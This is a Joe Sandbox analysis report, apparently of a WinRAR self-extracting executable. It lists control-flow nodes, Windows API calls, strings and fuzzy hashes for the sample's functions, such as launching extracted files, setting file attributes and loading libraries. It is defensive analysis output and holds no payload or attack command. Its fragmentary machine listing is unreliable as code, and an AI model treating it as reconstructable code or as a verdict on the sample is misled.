87c8db 24797->24798 24803 87a90e 84 API calls 24798->24803 24800 87c90d 24804 87a90e 84 API calls 24800->24804 24802 87c918 24803->24800 24804->24802 24806 87a5fe 24805->24806 24807 87a691 FindNextFileW 24806->24807 24808 87a621 FindFirstFileW 24806->24808 24809 87a6b0 24807->24809 24810 87a69c GetLastError 24807->24810 24811 87a638 24808->24811 24816 87a675 24808->24816 24809->24816 24810->24809 24812 87b66c 2 API calls 24811->24812 24813 87a64d 24812->24813 24814 87a651 FindFirstFileW 24813->24814 24815 87a66a GetLastError 24813->24815 24814->24815 24814->24816 24815->24816 24816->24432 24817->24266 24818->24272 24819->24272 24820->24275 24821->24283 24823 879ef7 76 API calls 24822->24823 24824 871f5b 24823->24824 24825 8719a6 97 API calls 24824->24825 24828 871f78 24824->24828 24826 871f68 24825->24826 24826->24828 24829 876dc1 74 API calls 24826->24829 24828->24291 24828->24292 24829->24828 24831 88acc8 GetDlgItem 24830->24831 24832 
88ac8f GetMessageW 24830->24832 24831->24302 24831->24303 24833 88acb4 TranslateMessage DispatchMessageW 24832->24833 24834 88aca5 IsDialogMessageW 24832->24834 24833->24831 24834->24831 24834->24833 24875 88b8e0 93 API calls _swprintf 24876 888ce0 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 24879 8a16e0 CloseHandle 24836 88e1f9 24837 88e203 24836->24837 24838 88df59 ___delayLoadHelper2@8 19 API calls 24837->24838 24839 88e210 24838->24839 24928 88ebf7 20 API calls 24929 871f05 126 API calls __EH_prolog 24883 88ec0b 28 API calls 2 library calls 24931 88db0b 19 API calls ___delayLoadHelper2@8 22950 88c40e 22952 88c4c7 22950->22952 22959 88c42c _wcschr 22950->22959 22951 88c4e5 22955 88ce22 18 API calls 22951->22955 22968 88be49 _wcsrchr 22951->22968 22952->22951 22952->22968 23005 88ce22 22952->23005 22955->22968 22956 88ca8d 22957 8817ac CompareStringW 22957->22959 22959->22952 22959->22957 22960 88c11d SetWindowTextW 22960->22968 22965 88bf0b SetFileAttributesW 22966 88bfc5 GetFileAttributesW 22965->22966 22978 88bf25 ___scrt_fastfail 22965->22978 22966->22968 22970 88bfd7 DeleteFileW 22966->22970 22968->22956 22968->22960 22968->22965 22971 88c2e7 GetDlgItem SetWindowTextW SendMessageW 22968->22971 22974 88c327 SendMessageW 22968->22974 22979 8817ac CompareStringW 22968->22979 22980 88aa36 22968->22980 22984 889da4 GetCurrentDirectoryW 22968->22984 22989 87a52a 7 API calls 22968->22989 22990 87a4b3 FindClose 22968->22990 22991 88ab9a 76 API calls ___std_exception_copy 22968->22991 22992 8935de 22968->22992 22970->22968 22972 88bfe8 22970->22972 22971->22968 22986 87400a 22972->22986 22974->22968 22976 88c01d MoveFileW 22976->22968 22977 88c035 MoveFileExW 22976->22977 22977->22968 22978->22966 22978->22968 22985 87b4f7 52 API calls 2 library calls 22978->22985 22979->22968 22981 88aa40 22980->22981 22982 88ab16 22981->22982 22983 88aaf3 ExpandEnvironmentStringsW 22981->22983 22982->22968 22983->22982 22984->22968 22985->22978 23028 
873fdd 22986->23028 22989->22968 22990->22968 22991->22968 22993 898606 22992->22993 22994 89861e 22993->22994 22995 898613 22993->22995 22997 898626 22994->22997 23003 89862f _abort 22994->23003 23108 898518 22995->23108 22998 8984de _free 20 API calls 22997->22998 23001 89861b 22998->23001 22999 898659 HeapReAlloc 22999->23001 22999->23003 23000 898634 23115 89895a 20 API calls _abort 23000->23115 23001->22968 23003->22999 23003->23000 23116 8971ad 7 API calls 2 library calls 23003->23116 23007 88ce2c ___scrt_fastfail 23005->23007 23006 88d08a 23006->22951 23007->23006 23008 88cf1b 23007->23008 23122 8817ac CompareStringW 23007->23122 23119 87a180 23008->23119 23012 88cf4f ShellExecuteExW 23012->23006 23017 88cf62 23012->23017 23014 88cf47 23014->23012 23015 88cf9b 23124 88d2e6 6 API calls 23015->23124 23016 88cff1 CloseHandle 23018 88d00a 23016->23018 23019 88cfff 23016->23019 23017->23015 23017->23016 23020 88cf91 ShowWindow 23017->23020 23018->23006 23024 88d081 ShowWindow 23018->23024 23125 8817ac CompareStringW 23019->23125 23020->23015 23023 88cfb3 23023->23016 23025 88cfc6 GetExitCodeProcess 23023->23025 23024->23006 23025->23016 23026 88cfd9 23025->23026 23026->23016 23029 873ff4 __vsnwprintf_l 23028->23029 23032 895759 23029->23032 23035 893837 23032->23035 23036 89385f 23035->23036 23037 893877 23035->23037 23052 89895a 20 API calls _abort 23036->23052 23037->23036 23039 89387f 23037->23039 23054 893dd6 23039->23054 23041 893864 23053 898839 26 API calls _abort 23041->23053 23046 893907 23063 894186 51 API calls 3 library calls 23046->23063 23047 873ffe GetFileAttributesW 23047->22972 23047->22976 23050 893912 23064 893e59 20 API calls _free 23050->23064 23051 89386f 23065 88ec4a 23051->23065 23052->23041 23053->23051 23055 89388f 23054->23055 23056 893df3 23054->23056 23062 893da1 20 API calls 2 library calls 23055->23062 23056->23055 23072 898fa5 GetLastError 23056->23072 23058 893e14 23093 8990fa 38 API calls __cftof 23058->23093 23060 893e2d 23094 
899127 38 API calls __cftof 23060->23094 23062->23046 23063->23050 23064->23051 23066 88ec53 23065->23066 23067 88ec55 IsProcessorFeaturePresent 23065->23067 23066->23047 23069 88f267 23067->23069 23107 88f22b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23069->23107 23071 88f34a 23071->23047 23073 898fbb 23072->23073 23074 898fc7 23072->23074 23095 89a61b 11 API calls 2 library calls 23073->23095 23096 8985a9 20 API calls 3 library calls 23074->23096 23077 898fc1 23077->23074 23079 899010 SetLastError 23077->23079 23078 898fd3 23080 898fdb 23078->23080 23103 89a671 11 API calls 2 library calls 23078->23103 23079->23058 23097 8984de 23080->23097 23083 898ff0 23083->23080 23085 898ff7 23083->23085 23084 898fe1 23087 89901c SetLastError 23084->23087 23104 898e16 20 API calls _abort 23085->23104 23105 898566 38 API calls _abort 23087->23105 23088 899002 23090 8984de _free 20 API calls 23088->23090 23092 899009 23090->23092 23092->23079 23092->23087 23093->23060 23094->23055 23095->23077 23096->23078 23098 8984e9 RtlFreeHeap 23097->23098 23102 898512 __dosmaperr 23097->23102 23099 8984fe 23098->23099 23098->23102 23106 89895a 20 API calls _abort 23099->23106 23101 898504 GetLastError 23101->23102 23102->23084 23103->23083 23104->23088 23106->23101 23107->23071 23109 898556 23108->23109 23113 898526 _abort 23108->23113 23118 89895a 20 API calls _abort 23109->23118 23111 898541 RtlAllocateHeap 23112 898554 23111->23112 23111->23113 23112->23001 23113->23109 23113->23111 23117 8971ad 7 API calls 2 library calls 23113->23117 23115->23001 23116->23003 23117->23113 23118->23112 23126 87a194 23119->23126 23122->23008 23123 87b239 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 23123->23014 23124->23023 23125->23018 23134 88e360 23126->23134 23129 87a1b2 23136 87b66c 23129->23136 23130 87a189 23130->23012 23130->23123 23132 87a1c6 23132->23130 23133 87a1ca GetFileAttributesW 23132->23133 23133->23130 23135 87a1a1 
GetFileAttributesW 23134->23135 23135->23129 23135->23130 23137 87b679 23136->23137 23145 87b683 23137->23145 23146 87b806 CharUpperW 23137->23146 23139 87b692 23147 87b832 CharUpperW 23139->23147 23141 87b6a1 23142 87b6a5 23141->23142 23143 87b71c GetCurrentDirectoryW 23141->23143 23148 87b806 CharUpperW 23142->23148 23143->23145 23145->23132 23146->23139 23147->23141 23148->23145 24884 88ea00 46 API calls 6 library calls 23149 88db01 23150 88daaa 23149->23150 23152 88df59 23150->23152 23180 88dc67 23152->23180 23154 88df73 23155 88dfd0 23154->23155 23168 88dff4 23154->23168 23156 88ded7 DloadReleaseSectionWriteAccess 11 API calls 23155->23156 23157 88dfdb RaiseException 23156->23157 23158 88e1c9 23157->23158 23160 88ec4a _ValidateLocalCookies 5 API calls 23158->23160 23159 88e0df 23165 88e19b 23159->23165 23167 88e13d GetProcAddress 23159->23167 23162 88e1d8 23160->23162 23161 88e06c LoadLibraryExA 23163 88e0cd 23161->23163 23164 88e07f GetLastError 23161->23164 23162->23150 23163->23159 23169 88e0d8 FreeLibrary 23163->23169 23166 88e0a8 23164->23166 23177 88e092 23164->23177 23191 88ded7 23165->23191 23170 88ded7 DloadReleaseSectionWriteAccess 11 API calls 23166->23170 23167->23165 23171 88e14d GetLastError 23167->23171 23168->23159 23168->23161 23168->23163 23168->23165 23169->23159 23172 88e0b3 RaiseException 23170->23172 23175 88e160 23171->23175 23172->23158 23174 88ded7 DloadReleaseSectionWriteAccess 11 API calls 23176 88e181 RaiseException 23174->23176 23175->23165 23175->23174 23178 88dc67 ___delayLoadHelper2@8 11 API calls 23176->23178 23177->23163 23177->23166 23179 88e198 23178->23179 23179->23165 23181 88dc99 23180->23181 23182 88dc73 23180->23182 23181->23154 23199 88dd15 23182->23199 23185 88dc94 23209 88dc9a 23185->23209 23188 88ec4a _ValidateLocalCookies 5 API calls 23189 88df55 23188->23189 23189->23154 23190 88df24 23190->23188 23192 88dee9 23191->23192 23193 88df0b 23191->23193 23194 88dd15 DloadLock 8 API calls 23192->23194 23193->23158 23195 
88deee 23194->23195 23196 88df06 23195->23196 23197 88de67 DloadProtectSection 3 API calls 23195->23197 23218 88df0f 8 API calls 2 library calls 23196->23218 23197->23196 23200 88dc9a DloadUnlock 3 API calls 23199->23200 23201 88dd2a 23200->23201 23202 88ec4a _ValidateLocalCookies 5 API calls 23201->23202 23203 88dc78 23202->23203 23203->23185 23204 88de67 23203->23204 23206 88de7c DloadObtainSection 23204->23206 23205 88de82 23205->23185 23206->23205 23207 88deb7 VirtualProtect 23206->23207 23217 88dd72 VirtualQuery GetSystemInfo 23206->23217 23207->23205 23210 88dcab 23209->23210 23211 88dca7 23209->23211 23212 88dcaf 23210->23212 23213 88dcb3 GetModuleHandleW 23210->23213 23211->23190 23212->23190 23214 88dcc9 GetProcAddress 23213->23214 23216 88dcc5 23213->23216 23215 88dcd9 GetProcAddress 23214->23215 23214->23216 23215->23216 23216->23190 23217->23207 23218->23193 24932 89a918 27 API calls 3 library calls 24933 88be49 108 API calls 4 library calls 24934 876110 80 API calls 24935 89b710 GetProcessHeap 24885 871025 29 API calls pre_c_initialization 23233 879f2f 23234 879f44 23233->23234 23239 879f3d 23233->23239 23235 879f4a GetStdHandle 23234->23235 23243 879f55 23234->23243 23235->23243 23236 879fa9 WriteFile 23236->23243 23237 879f7c WriteFile 23238 879f7a 23237->23238 23237->23243 23238->23237 23238->23243 23241 87a031 23245 877061 75 API calls 23241->23245 23243->23236 23243->23237 23243->23238 23243->23239 23243->23241 23244 876e18 60 API calls 23243->23244 23244->23243 23245->23239 24937 891522 RaiseException 24886 88a430 73 API calls 24943 88be49 103 API calls 4 library calls 24944 88d34e DialogBoxParamW 24888 88ec40 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24889 888c40 GetClientRect 24890 893040 5 API calls 2 library calls 24945 88be49 98 API calls 3 library calls 24891 8a0040 IsProcessorFeaturePresent 24946 889b50 GdipDisposeImage GdipFree __except_handler4 24893 898050 8 API calls 
___vcrt_uninitialize 24021 879b59 24022 879bd7 24021->24022 24025 879b63 24021->24025 24023 879bad SetFilePointer 24023->24022 24024 879bcd GetLastError 24023->24024 24024->24022 24025->24023 24897 88fc60 51 API calls 2 library calls 24899 893460 RtlUnwind 24900 899c60 71 API calls _free 24901 899e60 31 API calls 2 library calls 24902 871075 82 API calls pre_c_initialization 24846 88d573 24847 88d580 24846->24847 24848 87ddd1 53 API calls 24847->24848 24849 88d594 24848->24849 24850 87400a _swprintf 51 API calls 24849->24850 24851 88d5a6 SetDlgItemTextW 24850->24851 24852 88ac74 5 API calls 24851->24852 24853 88d5c3 24852->24853 24905 885c77 121 API calls __vsnwprintf_l

                Control-flow Graph

                APIs
                  • Part of subcall function 008800CF: GetModuleHandleW.KERNEL32(kernel32), ref: 008800E4
                  • Part of subcall function 008800CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 008800F6
                  • Part of subcall function 008800CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00880127
                  • Part of subcall function 00889DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00889DAC
                  • Part of subcall function 0088A335: OleInitialize.OLE32(00000000), ref: 0088A34E
                  • Part of subcall function 0088A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0088A385
                  • Part of subcall function 0088A335: SHGetMalloc.SHELL32(008B8430), ref: 0088A38F
                  • Part of subcall function 008813B3: GetCPInfo.KERNEL32(00000000,?), ref: 008813C4
                  • Part of subcall function 008813B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 008813D8
                • GetCommandLineW.KERNEL32 ref: 0088D61C
                • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0088D643
                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0088D654
                • UnmapViewOfFile.KERNEL32(00000000), ref: 0088D68E
                  • Part of subcall function 0088D287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0088D29D
                  • Part of subcall function 0088D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0088D2D9
                • CloseHandle.KERNEL32(00000000), ref: 0088D697
                • GetModuleFileNameW.KERNEL32(00000000,008CDC90,00000800), ref: 0088D6B2
                • SetEnvironmentVariableW.KERNEL32(sfxname,008CDC90), ref: 0088D6BE
                • GetLocalTime.KERNEL32(?), ref: 0088D6C9
                • _swprintf.LIBCMT ref: 0088D708
                • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0088D71A
                • GetModuleHandleW.KERNEL32(00000000), ref: 0088D721
                • LoadIconW.USER32(00000000,00000064), ref: 0088D738
                • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 0088D789
                • Sleep.KERNEL32(?), ref: 0088D7B7
                • DeleteObject.GDI32 ref: 0088D7F0
                • DeleteObject.GDI32(?), ref: 0088D800
                • CloseHandle.KERNEL32 ref: 0088D843
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                • API String ID: 788466649-433059772
                • Opcode ID: f7771abca40057ea16a471ffb22f152a49a7107aa60eb260b25bac1d1487ca24
                • Instruction ID: 08c6bff0644763c94115c57ba0c4d33ed3a0f33a88e95417d9afa0efa292432a
                • Opcode Fuzzy Hash: f7771abca40057ea16a471ffb22f152a49a7107aa60eb260b25bac1d1487ca24
                • Instruction Fuzzy Hash: 85619F71900341AFE320BBA9EC49F6B7BACFB45741F040529F545D2292EB78DD04CBA2

                Control-flow Graph
                APIs
                • FindResourceW.KERNEL32(0088AE4D,PNG,?,?,?,0088AE4D,00000066), ref: 00889E2E
                • SizeofResource.KERNEL32(00000000,00000000,?,?,?,0088AE4D,00000066), ref: 00889E46
                • LoadResource.KERNEL32(00000000,?,?,?,0088AE4D,00000066), ref: 00889E59
                • LockResource.KERNEL32(00000000,?,?,?,0088AE4D,00000066), ref: 00889E64
                • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0088AE4D,00000066), ref: 00889E82
                • GlobalLock.KERNEL32(00000000,?,?,?,?,?,0088AE4D,00000066), ref: 00889E93
                • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00889EFC
                • GlobalUnlock.KERNEL32(00000000), ref: 00889F1B
                • GlobalFree.KERNEL32(00000000), ref: 00889F22
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
                • String ID: PNG
                • API String ID: 4097654274-364855578
                • Opcode ID: e6b3c3535e40756e1ecd2415ac5665592d6bc4b3c4c7c6cb2e371914960286e2
                • Instruction ID: 3291de61b0ac98f894b173455f6248f5807f6888e4b1a3c05779f0b5effe6f82
                • Opcode Fuzzy Hash: e6b3c3535e40756e1ecd2415ac5665592d6bc4b3c4c7c6cb2e371914960286e2
                • Instruction Fuzzy Hash: 2D319171204706AFD711AF61EC48A2BBFADFF86751B080629F946D2260EB71DC00CBA1

                Control-flow Graph
                APIs
                • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0087A4EF,000000FF,?,?), ref: 0087A628
                • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0087A4EF,000000FF,?,?), ref: 0087A65E
                • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0087A4EF,000000FF,?,?), ref: 0087A66A
                • FindNextFileW.KERNEL32(?,?,?,?,?,?,0087A4EF,000000FF,?,?), ref: 0087A692
                • GetLastError.KERNEL32(?,?,?,?,0087A4EF,000000FF,?,?), ref: 0087A69E
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: FileFind$ErrorFirstLast$Next
                • String ID:
                • API String ID: 869497890-0
                • Opcode ID: 483c579b994f5a628afa858fd9f4e4d293f7989751e3dc7ce8a9cb0667de9a8f
                • Instruction ID: 5203b72199b672506d29d5cf7a3f725c35542518544535416c9bf9137a8cc6cd
                • Opcode Fuzzy Hash: 483c579b994f5a628afa858fd9f4e4d293f7989751e3dc7ce8a9cb0667de9a8f
                • Instruction Fuzzy Hash: 39417E72504645AFC324EF68C884ADEF7E8FB99344F044A2AF59DD3200E774E9588B92
                APIs
                • GetCurrentProcess.KERNEL32(00000000,?,00897513,00000000,008ABAD8,0000000C,0089766A,00000000,00000002,00000000), ref: 0089755E
                • TerminateProcess.KERNEL32(00000000,?,00897513,00000000,008ABAD8,0000000C,0089766A,00000000,00000002,00000000), ref: 00897565
                • ExitProcess.KERNEL32 ref: 00897577
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: Process$CurrentExitTerminate
                • String ID:
                • API String ID: 1703294689-0
                • Opcode ID: 988f1a2fd21c3ef368fcfeded4f4c4b4e623911316081ad303de35f81ee6d1b9
                • Instruction ID: 1f6873144a37222e87ac61869d69bf1564b6ff7848c629dae6140dfb5b9ba2bc
                • Opcode Fuzzy Hash: 988f1a2fd21c3ef368fcfeded4f4c4b4e623911316081ad303de35f81ee6d1b9
                • Instruction Fuzzy Hash: BDE04631010908ABDF11BF28CD09A483B29FB02341F098024F9058A622CB35DE42CA81
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: H_prolog_memcmp
                • String ID:
                • API String ID: 3004599000-0
                • Opcode ID: e2510a0395162fdbf56439fb2f6999ae0d267dfa98b29dc72f35a78ac78cfa65
                • Instruction ID: 9aee37a02e4dde5f02f94459318fd121d3da66abe426b227d66b7802fec95c90
                • Opcode Fuzzy Hash: e2510a0395162fdbf56439fb2f6999ae0d267dfa98b29dc72f35a78ac78cfa65
                • Instruction Fuzzy Hash: 6A820871904145EEDF25DB64C889BFABBA9FF15304F08C0B9E89DDB14ADB20DA44CB61
                APIs
                • __EH_prolog.LIBCMT ref: 0088AEE5
                  • Part of subcall function 0087130B: GetDlgItem.USER32(00000000,00003021), ref: 0087134F
                  • Part of subcall function 0087130B: SetWindowTextW.USER32(00000000,008A35B4), ref: 00871365
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: H_prologItemTextWindow
                • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                • API String ID: 810644672-3617005944
                • Opcode ID: 2fa7d972dbf15b65805e547c9f3bd2a3ca4be2ab2bbd40e8d3cb8ad2d5293f53
                • Instruction ID: 2c77d5b080a8561c8b261330215c9a44e5eb43d943938326f4cc91bcd3048347
                • Opcode Fuzzy Hash: 2fa7d972dbf15b65805e547c9f3bd2a3ca4be2ab2bbd40e8d3cb8ad2d5293f53
                • Instruction Fuzzy Hash: C942E070944244BEEB21BBA49C8AFBE7B7CFB52704F004265F245E61D2CB789D44CB26

                Control-flow Graph
                APIs
                • GetModuleHandleW.KERNEL32(kernel32), ref: 008800E4
                • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 008800F6
                • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00880127
                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 008803D4
                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008803F0
                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00880402
                • ReadFile.KERNEL32(00000000,?,00007FFE,008A3BA4,00000000), ref: 00880421
                • CloseHandle.KERNEL32(00000000), ref: 00880479
                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0088048F
                • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 008804E7
                • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00880510
                • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 0088054A
                  • Part of subcall function 00880085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008800A0
                  • Part of subcall function 00880085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0087EB86,Crypt32.dll,00000000,0087EC0A,?,?,0087EBEC,?,?,?), ref: 008800C2
                • _swprintf.LIBCMT ref: 008805BE
                • _swprintf.LIBCMT ref: 0088060A
                  • Part of subcall function 0087400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0087401D
                • AllocConsole.KERNEL32 ref: 00880612
                • GetCurrentProcessId.KERNEL32 ref: 0088061C
                • AttachConsole.KERNEL32(00000000), ref: 00880623
                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00880649
                • WriteConsoleW.KERNEL32(00000000), ref: 00880650
                • Sleep.KERNEL32(00002710), ref: 0088065B
                • FreeConsole.KERNEL32 ref: 00880661
                • ExitProcess.KERNEL32 ref: 00880669
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                • API String ID: 1201351596-3298887752
                • Opcode ID: e8fe367257bc1ed9c0aaa531334018adeef17240ad646c7bcd52888576528780
                • Instruction ID: 06a97945c3ccfe63b50bb19bb101b5f79908c8f702aa3d8467f3b813049a3254
                • Opcode Fuzzy Hash: e8fe367257bc1ed9c0aaa531334018adeef17240ad646c7bcd52888576528780
                • Instruction Fuzzy Hash: 1DD186B1548744ABE770AF94D849B9FBAE8FB86704F00491CF799D6940DBB0860C8F63

                Control-flow Graph
                APIs
                • __EH_prolog.LIBCMT ref: 0088BDFA
                  • Part of subcall function 0088AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0088AAFE
